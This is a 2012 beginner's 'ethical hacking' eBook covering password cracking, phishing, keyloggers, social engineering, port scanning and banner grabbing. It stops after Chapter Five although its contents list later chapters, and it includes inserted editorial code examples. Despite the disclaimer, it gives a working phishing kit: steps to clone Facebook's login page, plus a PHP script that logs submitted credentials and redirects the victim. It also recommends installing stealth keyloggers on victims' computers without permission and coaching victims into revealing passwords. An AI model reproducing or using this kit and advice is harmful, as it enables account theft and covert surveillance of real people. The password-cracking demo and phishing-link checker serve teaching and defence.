The Power of Hacking: Complete Solution to Your Dream of Becoming an Ethical Hacker and Computer Security Expert. By Karan Singh Chauhan, www.krackoworld.com


Copyright Notice: The information in this eBook may not be copied or reproduced unless specific permission has been given by the author. Any unauthorized use, distribution or reproduction is strictly prohibited. It is filed under DMCA protection.

Legal Disclaimer: The information provided in this eBook is to be used for educational purposes only. The eBook's creator is in no way responsible for any kind of misuse or damage done by readers after reading it. All of the information in this eBook is meant to help the reader develop a defensive attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. The words "hack" and "hacking" in this eBook should be read as "ethical hack" and "ethical hacking" respectively. You apply the information given here at your own risk.

© Copyright 2012 krackoworld.com. All Rights Reserved.

Table of Contents

Throughout this eBook the following topics are discussed.

A. Introduction
1. Who is Karan Singh Chauhan?
2. How can I use this eBook?
3. Hacker Definition
4. Hacker Hierarchy
5. What does it take to become a hacker?

B. Programming
1. Is it mandatory to learn programming or not?
2. Where should I start?
3. Best way to learn it
4. Advantages and Disadvantages of Programming

C. Linux
1. What is Linux?
2. Choosing a distribution
3. Running Linux
4. Learning Linux

D. Passwords
1. Password Cracking Methods: Dictionary Attacks, Brute-force Attacks, Rainbow Tables and software
2. Phishing Attacks
3. Keylogging
4. Shoulder Surfing and Guessing
5. Social Engineering
6. Primary Email Address hack
7. Harmful Viruses and Scripts
8. Some ready-made Tools and Software
9. Countermeasures

E. Network Hacking
1. Footprinting
2. Port Scanning
3. Banner Grabbing
4. Vulnerability Searching
5. Penetration Testing
6. Countermeasures

F. Wireless Hacking
1. Scanning for Wireless Networks
2. Types of Encryption
3. Cracking WEP
4. Packet Sniffing
5. Countermeasures

G. Windows Hacking
1. NetBIOS
2. Cracking Windows Passwords
3. Countermeasures

H. Web Hacking
1. How to find a vulnerable website and start hacking?
2. Cross Site Scripting
3. Performing SQL Attacks
4. Denial of Service Attack
5. Remote File Inclusion
6. Cookie Poisoning
7. DotNetNuke
8. Local File Inclusion
9. Session Hijacking
10. Countermeasures

I. Malware
1. Types of Malware
2. ProRat
3. Countermeasures

J. Conclusion
1. Congratulations
2. Tell others about my eBook
3. My Website/Blog
4. Suggestions
5. Keep us Strong
6. Any Doubts are welcomed here
7. Warm Regards


Chapter One- Introduction

Who is Karan Singh Chauhan? Karan is an 18-year-old currently living in Punjab, India, as a B.Tech student (engineering) in the field of Electronics and Communication. He is an ethical hacker, security expert, computer software developer and eBook writer as well. During his leisure time he loves to write about what he knows well at KrackoWorld (author and founder). He started blogging in late 2010, just for fun and to increase its popularity worldwide. At that time he was in 12th class as a non-medical student. He already had a lot of knowledge about computers in the areas of basics, software, hardware and web designing, because from 6th class he had been taking extra courses in it. From there his life changed dramatically and he got involved in the world of blogging. Special thanks to my God, my parents and Blogger, which gave me the platform to express myself in front of the whole world by choosing this way out. The purpose of building KrackoWorld and writing posts on it is to make people aware of what is going on around them in the fields of ethical hacking and cyber security. I never wanted or dreamed of hacking someone's account just for entertainment or money; the main aim was to tell my readers, for educational purposes only, about the tricks hackers usually use to steal information and data. My only addiction is to help and protect people from getting hacked and to secure them in future, as I am a white hat hacker. Our motto and aim: Know Hacking But No Hacking


Enjoy! Karan Singh Chauhan

How can I use this eBook? Congratulations! You have taken your first step in the field of ethical hacking and security on the way to becoming a master hacker. You will now acquire the following: 1. The ability to think like hackers and crackers. 2. A possible career in ethical hacking. Usually hired by an organization or department, an ethical hacker uses the same tools and techniques as a hacker to find and secure vulnerabilities in computer systems. 3. Techniques to show off to your friends and apply in the real world. It's fun! 4. Ways to secure your computer from Trojans, worms, adware, etc.

Hacker Definition


A hacker is someone who likes to tinker with electronics or computer systems for fun. Hackers like to explore and learn how computer systems work, finding ways to make them do what they do better, or do things they weren't intended to do. There are two types of hackers: White Hat: These are considered the good guys. White hat hackers don't use their skills for illegal purposes. They usually become computer security experts and help protect people from the black hats. Black Hat: These are considered the bad guys. Black hat hackers use their skills maliciously for personal gain. They are the people who hack banks, steal credit cards, hack email IDs and passwords, and deface websites.

Hacker Hierarchy


Script kiddies These are the wannabe hackers. They are looked down upon in the hacker community because they are the people who make hackers look bad. Script kiddies usually have no hacking skills and use the tools developed by other hackers without any knowledge of what's happening behind the scenes. Intermediate hackers These people usually know about computers and networks and have enough programming knowledge to understand roughly what a script does, but like the script kiddies they use pre-developed, well-known exploits (an exploit is a piece of code that takes advantage of a bug or vulnerability in a piece of software to take control of a computer system) to carry out attacks. Elite hackers These are the skilled hackers. They are the ones who write many of the hacker tools and exploits out there. They can break into systems and hide their tracks, or make it look like someone else did it. You should strive eventually to reach this level.

What does it take to become a hacker? Becoming a great hacker isn't easy and it doesn't happen quickly. Being creative helps a lot. There is more than one way a problem can be solved, and as a hacker you will encounter many problems. The more creative you are, the better your chance of getting into a system without being detected. Another huge quality you must have is the will to learn, because without it you will get nowhere. Remember, knowledge is power. Patience is also a must, because many topics are difficult to grasp and only over time will you master them. In the end I would like to say only one line: "Exploring is the best way to become a successful hacker in today's world."


Chapter Two- Programming

Is it mandatory to learn programming or not?

Lots of readers ask me whether learning programming is mandatory for a hacker to increase his potential. The answer is yes, at least to the extent of knowing the basics, because programming is what turns a tool user into an elite hacker. So today I will tell you the advantages and disadvantages of learning programming, and how to learn it properly. Enjoy!

Where should I start? Many people finally decide that they are going to learn a programming language but don't know where to start. I believe that before you begin a programming language you should first master HTML (Hypertext Markup Language). HTML is part of what makes up every web page you see on the internet. HTML is very easy to learn and it will help you read the source code of pages. Blogging and template designing are also good ways to learn it, in my view. From there I would suggest starting your programming life with C. C is one of the most popular languages, and it is what the majority of the exploits out there today are written in. Some of the most powerful hacking programs and viruses are also written in C.

Best way to learn it
1. Buy a beginner's book on your programming language, preferably in a language you read comfortably. Before you choose the book, read the reviews to make sure it's a good choice.
2. Once you begin learning the language from your book, don't take big breaks. Long breaks will make you forget things from the beginning that the rest of the book builds on.
3. Do ALL of the practice problems in the book. The only way you will become better is by applying what you learn.
4. When something difficult comes up, or something that makes no sense to you, don't avoid or skip it. Embrace it! This is how you actually learn. If you still don't understand it after going over it multiple times, find someone who can help you.
5. Join a programming forum. Look for a website about your programming language with a large user base. There will be many professionals there who can help you when you get stuck.
6. Practice, practice, practice. Think of ideas for fun programs you could make, and write them!

Advantages and Disadvantages of Programming

Advantages
1. You'll be considered an elite hacker.
2. Imagine a black hat discovers a vulnerability and codes an exploit for it that no one else knows about. The black hat would be able to compromise thousands of machines before anyone discovers and patches the vulnerability. Being able to write that code yourself is what makes this possible.
3. You will feel much more satisfied having created your own program or exploit. I promise you this.

So my advice is: don't settle for being a point-and-click hacker. Take some time to understand even just the basics of programming and an entire new world of hacking will open up to you.

Disadvantages of not learning programming
1. You'll be considered a script kiddie.
2. You won't have your own point of view, or be able to adapt tools to what you need.
3. You cannot find holes and vulnerabilities yourself.
4. You have no way of creating your own tools and exploits.

Chapter Three- Linux

What is Linux? To be clear, Linux is a free, open-source, UNIX-like operating system. The name "Linux" comes from the Linux kernel, originally written in 1991 by Linus Torvalds. It can be installed on a wide range of computer hardware, from mobile phones, tablet computers, routers and video game consoles to desktop computers, mainframes and supercomputers. As you continue to learn how to hack, you will realize how important it is to learn how to use the Linux operating system. Here are a couple of facts about it: 1. Millions of servers on the internet run the Linux operating system. You must learn the operating system to be able to assess and penetrate these web servers. 2. Some of the best hacking programs only run on Linux.

Choosing a Distribution A Linux distribution is the Linux kernel (the central component of an operating system) plus a collection of applications. If you are new to Linux, I suggest starting with Ubuntu as your first distribution. It is simple to install and very user friendly.

Running Linux There are many ways to get Linux up and running. I will show you the most popular methods below. • Live CD • Wubi • VirtualBox

1. Live CD A Live CD is a complete Linux system on a bootable CD, DVD or USB flash drive that runs directly from that medium without touching the hard disk, so you can try a distribution (or use it for rescue and security work) before installing anything. Ubuntu's download ISO is a Live CD that doubles as the installer. (The separate "Linux Live" scripts, which build a bootable image from an already installed Linux system so that it can be booted from a CD, USB drive or even an iPod, are a different tool.)


Procedure:
1. Download the Ubuntu Live CD .iso file from www.ubuntu.com.
2. Now save the file as
3. Once the .iso is downloaded, burn it to a CD and restart your system.
4. Press Del or F2 during start-up to enter the BIOS setup.
5. In the BIOS, go to the boot options, open "first boot device" and change it to DVD/CD-ROM.
6. Save and exit.
7. The system will restart and you will see the boot screen pictured below.
8. All done! Select your language and enjoy all its features.

2. Wubi
With the Wubi installer you can install and uninstall Ubuntu like any other Windows application. You can use the Live CD you downloaded in the steps above to install with Wubi, or download the installer from http://wubi-installer.org/ .

3. VirtualBox

VirtualBox is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature-rich, high-performance product for enterprise customers, it is also the only professional solution that is freely available as open source software under the terms of the GNU General Public License (GPL) version 2. See "About VirtualBox" for an introduction. You can download VirtualBox from https://www.virtualbox.org/wiki/Linux_Downloads . Presently VirtualBox runs on Windows, Linux, Macintosh and Solaris hosts and supports a large number of guest operating systems, including but not limited to Windows (NT 4.0, 2000, XP, Server 2003, Vista, Windows 7), DOS/Windows 3.x, Linux (2.4 and 2.6), Solaris and OpenSolaris, OS/2 and OpenBSD.


Learning Linux You can now learn Ubuntu, and Linux in general, in many ways:
• eBooks: A Practical Guide to Ubuntu Linux; How Linux Works; Understanding the Linux Kernel, Third Edition
• Online: Official Linux Website, Begin Linux, Linux Tutorials
• Video tutorials: Introduction to Linux, Ubuntu Linux Tutorials
Enjoy!

Chapter Four- Passwords Passwords are a form of security found on computers and on most websites. They are created to protect our data and useful information from hackers. A password may consist of letters, words, numerical values, special symbols, etc. Weak or stolen passwords are one of the easiest ways for a hacker to gain unauthorized access to your computer or network.

Password Cracking Methods We can crack the passwords of an account by the following methods listed below-

Dictionary Attacks


Intro: Are you interested in cracking passwords? Then try a dictionary attack instead of guessing. First, what is a dictionary attack and how does it work?

A dictionary attack successively tries every entry in an exhaustive, pre-arranged list called a dictionary. In contrast to a brute-force attack, where a large proportion of the key space is searched systematically, a dictionary attack tries only the possibilities most likely to succeed, typically derived from a list of words (a dictionary, hence the name), from a book such as the Bible, or from passwords leaked in earlier breaches. Dictionary attacks generally succeed because many people choose passwords that are short (7 characters or fewer), single dictionary words, or simple, easily predicted variations on words such as appending a digit. In practice the attack is a text file of commonly used passwords, or every word from a dictionary, run against a login prompt or a password database. Strong passwords usually aren't vulnerable to this kind of attack.

In the following example I will use Brutus, a very common password cracker, to show a dictionary attack against an FTP server. Brutus is a Windows-only program, but at the end of this chapter I list a couple more password crackers, some of which run on Mac, Windows and Linux.

Before the example, you must know what an FTP server is. FTP stands for File Transfer Protocol and is a simple way to exchange files over the internet. If a hacker got FTP access to my website, he could delete or upload anything he wants on my server. An FTP address looks like a website address except that it uses the prefix ftp:// instead of http://. I set up an FTP server on my own computer so I could demonstrate. You can get Brutus at http://www.hoobie.net/brutus/.

Procedure:
1. First the hacker chooses a target. In this case it is my own computer, reached through the loopback address 127.0.0.1 (this address always refers to the machine you are sitting at, never to a remote one).
2. Going to ftp://127.0.0.1 produces a pop-up box asking for a username and password.
3. Next the hacker launches a program such as Brutus and attempts to crack the password.
4. In the Target field put the IP address or hostname of the server and, to the right, select the appropriate protocol, which in this case is FTP.
5. The default port is 21, but some servers move it to make it a little less obvious. If the port isn't 21, you can find the right one with a port scan.
6. If you don't know any usernames for the FTP server, you will have to use a list of the most common usernames.
7. For a dictionary attack choose the pass mode Word List, then browse to and select the file containing your word list. You can get some good password lists at http://packetstormsecurity.org/Crackers/wordlists/. Below are examples of what a username list and a password list might look like.
8. Once you hit Start, the program connects to the server and begins trying all the combinations from your lists.
9. If you're lucky, it eventually finds the right username:password combination. As shown below, it found the combination username admin and password password.
10. A smarter hacker would use a proxy with a program like this. A proxy hides your IP address by sending your connection through another computer before it reaches the target. Every attempt Brutus makes is a failed login that the target's FTP server writes to its own log, so the attack leaves a large trace of your presence on the target. That's it!

Brute-force Attacks In cryptography, a brute-force attack is a strategy that can, in theory, be used against any encrypted data. Such an attack might be used when it is not possible to take advantage of other weaknesses in the system (if any exist) that would make the task easier. It involves systematically checking every possible key or password until the correct one is found; in the worst case this means traversing the entire search space, so brute-force attacks can take a very long time. The cost grows exponentially with length: with only the 26 lowercase letters there are 26^8 (about 2 x 10^11) eight-character candidates, and adding uppercase letters, digits and symbols, or one more character, multiplies that again. Below I show how Brutus can be used against the same FTP server.

1. Put in the target and port as you did for the dictionary attack, choose Brute-force as the pass mode and hit Range.
2. You will see the box shown below; select an option.
3. In this case I select Lowercase Alphabet because I know the password. When you try it yourself, work through the options one by one to find your password (each wider character set makes the run far longer).
4. Be patient and you will be done!


Rainbow Tables A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are used to recover the plaintext password up to a certain length and over a limited character set. A hash is a one-way function, not encryption: once a password is hashed there is no key that turns the digest back into the original string, so the only way back is to guess candidates, hash each one and compare. A rainbow table does that guessing once, in advance, and stores the results compactly, which is why it works against fast, unsalted hashes such as MD5 but is useless against a hash that mixes in a per-user random salt, because the precomputed digests no longer match.
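To make the three methods concrete, here is an added example for this edition (it is not code from the eBook, and not Brutus). It runs a dictionary attack with the same word-plus-digit mangling the text describes, a brute-force search over lowercase letters, and a precomputed digest lookup table (the idea behind a rainbow table, without the chain compression) against a constructed password database. The usernames, salts and wordlist are made up for the demonstration; the digests are computed at load time from those made-up values. The salted entry shows the countermeasure: the precomputed table misses it, and only a per-hash dictionary run still recovers its weak password.

```python
import hashlib
import itertools
import string

# Added example, not from the eBook. Everything below (users, salts, wordlist) is
# constructed for the demonstration.

WORDLIST = ["cricket", "table", "human", "password", "letmein", "qwerty"]
LOWER = string.ascii_lowercase


def md5_hash(password, salt=""):
    """MD5 of salt+password. Fast, and unsalted in most old deployments, which is
    exactly what rainbow tables were built for."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def sha256_hash(password, salt=""):
    """SHA-256 of salt+password; used here for the salted entry."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


HASHERS = {"md5": md5_hash, "sha256": sha256_hash}

# Constructed "password database": user -> (algorithm, salt, hex digest).
TARGETS = {
    "admin": ("md5", "", md5_hash("password")),                  # single dictionary word
    "bob":   ("md5", "", md5_hash("cricket1")),                  # word with a digit appended
    "eve":   ("md5", "", md5_hash("xkq")),                       # short random string, in no list
    "carol": ("sha256", "8f1c", sha256_hash("password", "8f1c")),  # weak word, but salted
}


def mangle(word):
    """Yield the cheap variations the text describes: the word itself, capitalised,
    and the word with a single digit appended."""
    yield word
    yield word.capitalize()
    for digit in string.digits:
        yield word + digit


def dictionary_attack(digest, hasher, salt, wordlist=WORDLIST):
    """Try every wordlist entry (and its mangled forms) against one hash."""
    for word in wordlist:
        for candidate in mangle(word):
            if hasher(candidate, salt) == digest:
                return candidate
    return None


def brute_force(digest, hasher, salt, alphabet=LOWER, max_len=3):
    """Try every string over `alphabet` up to `max_len` characters. The search space
    is len(alphabet)**length per length, which is why this only pays off for short
    passwords over small alphabets."""
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            candidate = "".join(chars)
            if hasher(candidate, salt) == digest:
                return candidate
    return None


def build_lookup_table(wordlist=WORDLIST):
    """Precomputed digest -> plaintext table for unsalted MD5. A real rainbow table
    compresses this with hash chains, but the principle is the same: hash once,
    then crack any number of hashes by lookup. A salt defeats it because the
    salted digest of 'password' is not in the table."""
    return {md5_hash(c): c for w in wordlist for c in mangle(w)}


def crack_all(targets=TARGETS, table=None):
    """Return user -> recovered password (or None), cheapest method first."""
    table = build_lookup_table() if table is None else table
    results = {}
    for user, (algo, salt, digest) in targets.items():
        hasher = HASHERS[algo]
        found = None
        if algo == "md5" and not salt:        # precomputation only helps unsalted MD5
            found = table.get(digest)
        if found is None:
            found = dictionary_attack(digest, hasher, salt)
        if found is None:
            found = brute_force(digest, hasher, salt)
        results[user] = found
    return results


if __name__ == "__main__":
    for user, password in crack_all().items():
        print(f"{user}: {password!r}")
```

Run it and the table alone recovers admin and bob, eve falls only to brute force (26^3 candidates), and carol's salted hash is missed by the table but recovered by the dictionary run because the password itself is weak: salting removes precomputation, not guessing, so the password policy and a slow hash still matter.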

Software in Action Cain and Abel is one of the popular tools for this kind of password cracking; you can download it from http://www.oxid.it/downloads/ca_setup.exe . John the Ripper is a powerful cracking system. Others: RainbowCrack, THC Hydra, etc.

Phishing Attacks Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. It is like fishing: the fisherman puts bait on the hook, pretending it is genuine food for the fish, and the hook inside pulls the whole fish out of the lake. Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of the social engineering techniques used to deceive users, and it exploits the poor usability of current web security technologies. A large share of account compromises happen this way, which is why phishing is considered the simplest and easiest way to steal someone's sensitive information. Below is the complete tutorial.

How to create it:
1. Open the website whose login page you want to copy, for example Facebook.com.
2. Right-click and save the page.
3. Open the saved page in Notepad, search for the form's action="http://..." attribute and change that address to login.php. Leave the form's method as POST: the login.php below reads $_POST, so a form submitted with GET would log nothing. Save.
4. Save the edited page as index.html.
5. Now create login.php: open a blank Notepad file, paste the code below and save it as login.php.

```php
<?php
// Send the visitor on to a real site so nothing looks wrong...
header('Location: http://google.com');
// ...while every submitted form field is appended to log.txt.
$handle = fopen("log.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
```

Note: by default the victim is redirected to google.com after clicking Login; to redirect anywhere else, change the address in the header() line.
6. Create an empty text file and save it as log.txt.
7. Create a free web hosting account at my3gb.com, 110mb.com or 000webhost.com and upload all three files created above: index.html, login.php and log.txt.
We are done; the phisher/fake login page is ready to use.

How accounts get stolen: the victim is sent the link to the uploaded index.html. Once he or she enters credentials and clicks Login on the fake page, everything is stored in the log.txt file in the hosting account, and the attacker simply opens log.txt to read the login details. It is very simple to create a fake login page for any website; the example here is a Facebook phisher, and the same steps produce phishers for Yahoo, Gmail, Orkut, etc.


Keylogging Keylogging is one of the easiest methods of taking over someone's accounts, using keyloggers such as SniperSpy or WinSpy. All you have to do is install a keylogger on the victim's computer without permission. A keylogger is a tool that records everything the user does on that PC, including passwords, usernames and sites visited. When the person logs in to an account on any website, the keystrokes are captured and stored by the keylogger; later the attacker returns to the machine (or receives the logs remotely) and reads the passwords. Remote installation is used when the attacker has no physical access to the victim. Installing keyloggers in cybercafés is another common approach.

1. SniperSpy Keylogger SniperSpy is marketed as a product that lets you access any online account or password-protected material such as MySpace, Facebook, Yahoo or Gmail, with no limitation on which accounts or websites it can capture.
Why SniperSpy? Hundreds of keyloggers are on the market and most of them are junk; only a few stand out, and SniperSpy is among them. I personally like SniperSpy for its remote installation feature: you can install it on a remote computer without physical access, and it operates in stealth mode so that it stays hidden. A summary of the benefits claimed for SniperSpy:
1. Access any password: capture the password to Facebook or any other online account.
2. Monitor every activity: monitor the target computer, take screenshots and record chats and IM conversations.
3. Stealth: SniperSpy runs in stealth mode and so is hard for the victim to notice.
4. Remote installation: it can be installed on computers you have no physical access to, as well as locally.
5. Easy to use: installing and using it needs no special skill.
6. Safe to use: the vendor states that it collects no information from your own computer and offers full privacy to its users.
7. Works on both Windows and Mac: compatible with Windows 2000/XP/Vista/7 and Mac.
So if you are serious about capturing someone's password, SniperSpy is the one the author recommends.

2. WinSpy You can download and install WinSpy from www.win-spy.com/ .

Shoulder Surfing When you type your password, make sure nobody behind you is trying to peek at what you are typing. If someone is, turn around and warn him or her not to do it again, or wait until the person has left. Also make sure you don't leave sticky notes lying around with your password or password hints on them.

Guessing To prevent this attack, never use a password such as your birth date, your mobile number, your mother's maiden name, your pet's name, your spouse's name, or anything else that someone could guess easily. Also never use passwords made of sequential digits, such as 12345678.

Social Engineering This sounds good, but I guess most people aren't aware of it. For newbies, social engineering is the method of obtaining a password, or the answer to a security question, simply by asking the victim for it, usually disguised as innocent conversation. You have to be very careful with this method, because the victim must not become aware of your intention. Ask cautiously, using your logic and your own way.

Primary Email Address hack A primary email address hack means first gaining access to the victim's Yahoo, Gmail, Rediff, etc. mailbox, then telling Facebook that you have forgotten the password and giving it the victim's registered email address, which you already control. The password reset link or code arrives in that inbox, and you use it to set a new password and log in to the victim's Facebook account. So always remember to protect the primary email address attached to your Facebook account at least as well as Facebook itself: a strong, unique password on the mailbox, and never an abandoned or forgotten address as the recovery address, since an address nobody watches is the easiest one to take over. Note: for your better understanding I have taken Facebook as the example here.

Harmful Viruses and Scripts If the hacker fails to hack someone's account by the methods above, he or she starts producing harmful scripts or "viruses" with names like OMG, WOW, DAMN, CLICK HERE and other pranks. When you click on one, you are redirected to a hidden page containing inappropriate content, and your account gets hijacked. So I suggest that before clicking such links you scan them with a good online scanner, and never install uncertified add-ons on your computer. Many such scripts also promise to bypass security, for example on Facebook: how to see anyone's private photos, how to remove Facebook advertisements, how to break someone's privacy, how to undo Facebook changes, etc.

Some ready-made Tools and Software Some hackers or vendors claim to have made a tool or hacking software with which you can easily hack someone's Facebook, Gmail, etc. account without knowing the basics of hacking. They then ask you to buy that software for some dollars, say $25, but the fact is that they are fooling you: the software either works only partially or stops working once the bugs it relied on are fixed. Examples of such software are Facebook Account Freezer, Gmail Hacking Tool, Yahoo Cracker, etc.

Countermeasures Now I will describe the countermeasures you should take to protect yourself from the password cracking methods and attacks discussed above in this chapter.

Dictionary Attacks To prevent this attack, do not use dictionary words as passwords (for example cricket, table, human). Use passwords that mix letters, digits and special symbols, or a long passphrase of several unrelated words.

Brute-force Attacks To prevent this attack, always use very long passwords containing many digits and unusual characters; every extra character multiplies the attacker's work.

Rainbow Tables You can defeat rainbow tables with passwords long enough to fall outside the lengths the tables were built for. On the server side the real fix is to store passwords with a per-user random salt and a slow hash (bcrypt, scrypt or PBKDF2), because a salt makes every precomputed table useless.

Phishing attacks These are fairly simple to detect if you keep two things in mind. 1. (Taking Gmail as the example) If anyone asks you to click a link, first check that the address really is www.gmail.com (or another gmail.com / mail.google.com address); if it is gmailmail.com, gmailuser.110mb.com or anything else, do not click it. Read the host name right up to the first slash: www.gmail.com.evil.example is not Gmail. 2. Check whether the page is served over HTTPS. A phishing page on free hosting often is not, but the reverse does not hold: a padlock only means the connection to that host is encrypted, not that the host is the real site, so never treat HTTPS alone as proof that a page is legitimate.

Keylogging Whenever you log in to a personal account from a cafe, a friend's computer, the office, etc., first check the installed programs and running processes for a keylogger and remove it before you do anything. Keyloggers may be only a few kilobytes or several megabytes in size. Bear in mind that a well-hidden keylogger will not show up in such a check, so the safest rule is not to enter important passwords on a machine you do not control.
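As an added example (written for this edition, not part of the eBook), the two phishing checks above as a small Python routine: it extracts the host a browser would actually connect to, tests whether that host is the expected domain or a subdomain of it, flags lookalikes that merely contain the brand name (including the user@host trick, where the text before the @ is not the host at all), and reports HTTPS as a separate signal rather than as proof. The list of legitimate domains and the sample links are constructed for the demonstration.

```python
from urllib.parse import urlparse

# Added example, not from the eBook. LEGITIMATE and SAMPLE_LINKS are constructed
# for the demonstration; extend LEGITIMATE with the sites you actually use.
LEGITIMATE = ["gmail.com", "facebook.com"]


def parse_link(url):
    """Return (scheme, userinfo, host) for a URL, tolerating a missing scheme.
    urlparse puts everything before '@' into .username, so for
    http://www.gmail.com@evil.example/ the host is 'evil.example'."""
    parsed = urlparse(url if "://" in url else "http://" + url)
    host = (parsed.hostname or "").lower().rstrip(".")
    return parsed.scheme.lower(), (parsed.username or "").lower(), host


def is_under(host, domain):
    """True if host is the domain itself or a subdomain of it
    (www.gmail.com is under gmail.com; gmail.com.evil.example is not)."""
    return host == domain or host.endswith("." + domain)


def classify_link(url, legitimate=LEGITIMATE):
    """Classify a link as 'legitimate', 'lookalike', 'unknown' or 'invalid' and
    report whether it uses HTTPS. HTTPS is reported separately on purpose: an
    encrypted connection to the wrong host is still the wrong host."""
    scheme, username, host = parse_link(url)
    if not host:
        return {"host": host, "verdict": "invalid", "https": False}
    verdict = "unknown"
    if any(is_under(host, d) for d in legitimate):
        verdict = "legitimate"
    else:
        # Brand name appearing anywhere in the host or in the user@ part,
        # without being the real domain, is the classic lookalike pattern.
        brands = [d.split(".")[0] for d in legitimate]
        if any(b in host or b in username for b in brands):
            verdict = "lookalike"
    return {"host": host, "verdict": verdict, "https": scheme == "https"}


def triage(urls, legitimate=LEGITIMATE):
    """Return the links from `urls` that should not be clicked."""
    return [u for u in urls if classify_link(u, legitimate)["verdict"] != "legitimate"]


# Constructed sample links, modelled on the examples in the text above.
SAMPLE_LINKS = [
    "https://www.gmail.com/",
    "http://gmailmail.com/login",
    "http://gmailuser.110mb.com/index.html",
    "https://www.gmail.com.evil.example/",
    "http://www.gmail.com@evil.example/",
    "http://facebook.com/",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(link, classify_link(link))
```

Note that the third sample uses HTTPS and is still a lookalike, which is the point of keeping the HTTPS flag out of the verdict. The check is deliberately strict: any host that is not under a listed domain but contains the brand name is flagged, so a legitimate secondary domain of the same company would also be reported and would need adding to the list.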

Social Engineering


To protect yourself from this attack, be very careful when someone asks you for personal information or for the answers to your security questions. Always get to know the person properly before telling him or her anything personal, and ask several relevant questions about yourself and about them first.

Shoulder Surfing, Guessing, Primary Email Address hack, Harmful Viruses and Scripts, Some ready-made Tools and Software: the countermeasures for these topics are discussed in the paragraphs where each is first defined.

Chapter Five- Network Hacking

Footprinting


Footprinting is the technique of gathering information about target computer systems and the entities they belong to. It uses techniques such as network/DNS queries, port scanning, OS identification, ping sweeps, web spiders and WHOIS lookups. Some widely used footprinting tools are Telnet, nslookup, ping, tracert and netstat; they are described below.

1. Ping: Ping uses ICMP (Internet Control Message Protocol) echo request and echo reply messages and is used to troubleshoot TCP/IP networks. Ping is basically a command that lets you check whether a host is alive, or at least whether it answers ICMP. To ping a host, at the command prompt type:
C:\>ping hostname.com
Example: C:\>ping www.google.com

2. Netstat: Displays protocol statistics and current TCP/IP network connections, i.e. local address, remote address, port number, etc. Its syntax (at the command prompt) is:
C:\>netstat -n

3. Telnet: Telnet is a program that runs over TCP/IP. With it we can connect to a remote computer on a particular port. Once connected, whatever greeting the daemon listening on that port sends back is displayed, which identifies the service (this is banner grabbing). The basic syntax is:
C:\>telnet hostname.com
By default telnet connects to port 23 of the remote computer. The complete syntax is:
C:\>telnet www.hostname.com port
Example: C:\>telnet www.yahoo.com 21 or C:\>telnet 192.168.0.5 21

4. Tracert: Used to trace the route taken by data packets from source to destination. Its syntax is:
C:\>tracert www.hostname.com
Example: C:\>tracert www.krackoworld.com

Here "* * * Request timed out." means that a hop (a firewall or router along the path, or the target itself) did not answer within the time limit, so its address is not shown; it does not mean the target's IP address cannot be found, since tracert resolves the destination name before it starts. The various options of the tracert command and their usage can be seen by typing C:\>tracert with no arguments at the command prompt. The information obtained with tracert maps the network path to the target and feeds later steps such as operating system fingerprinting.

Overview of Footprinting:
1. First the hacker collects information about the target domain, including its IP address, registry information, website owner and contact information, through WHOIS tools.
2. Next the hacker pings the server to see whether it is up and running, because an offline server cannot be attacked. For example, www.downornot.com and www.just-ping.com are websites that ping a server from different locations around the world.
3. Then the hacker searches the site's pages and directories via the Google search engine for security loopholes.


Port Scanning

Port scanning finds which ports on a host are open (a service is listening), closed, or filtered by a firewall. If a hacker finds an open port, he or she identifies the service behind it and starts looking for vulnerabilities in that service to exploit and gain control of the server. Nmap is the most popular port scanner; it runs on Windows, Mac and Linux and can be downloaded from http://nmap.org/download.html . After installing it, type the target in the target field of the Zenmap GUI and choose the "Intense scan" profile; the command it runs is
nmap -T Aggressive -A -v www.victims-website.com
(-T Aggressive, the same as -T4, sets fast timing; -A enables OS detection, version detection, script scanning and traceroute; -v is verbose output). Add -p- to scan all 65,535 TCP ports instead of the default 1,000 most common ones. With -v each open port is reported as it is found, for example:
Discovered open port 80/tcp on 192.168.1.110
Learn how to close it! On Windows choose Start -> Settings -> Control Panel -> Administrative Tools and select Services. Scroll down the list until you find the service that owns the port, select it, change the start-up type to "Disabled" and click "Stop". Be sure you know what you are doing there, because you could stop services required to keep your machine running. A port that has to stay open (a public web server's port 80) is protected by patching the service and putting a firewall in front of it, not by closing it. Scan only hosts you own or are authorized to test; scanning third-party systems without permission is treated as an attack.

Banner Grabbing

Once you have found open ports, you need to know exactly what is listening on them before anything can be exploited; that is where banner grabbing comes in. Banner grabbing is a technique that reveals the software and version of the service on a port, and often the operating system it runs on. For example, one can connect to a target host running a web service with Netcat and send a minimal HTTP request to get information about the service:

[root@prober] nc www.targethost.com 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Mon, 11 May 2009 22:10:40 EST
Server: Apache/2.0.46 (Unix) (Red Hat/Linux)
Last-Modified: Thu, 16 Apr 2009 11:20:14 PST
ETag: "1986-69b-123a4bc6"
Accept-Ranges: bytes
Content-Length: 1110
Connection: close
Content-Type: text/html

(The empty line after HEAD / HTTP/1.0 is required; it ends the request.) The Server header is the banner: Apache 2.0.46 on a Red Hat system.

How it works
Say port 21 is open, which is the FTP port. We use telnet, discussed above, to talk to it: open cmd from the Start menu, type telnet www.victims-website.com 21 and hit Enter. You connect to the server and it prints its greeting (banner), which usually names the FTP software and its version. That's it! In the next topic we look up vulnerabilities for it. Keep in mind that administrators can change or remove banners (Apache's ServerTokens Prod setting, for example), and that distributions such as Red Hat backport security fixes without changing the version string, so a banner is a hint, not proof that a vulnerable version is running.
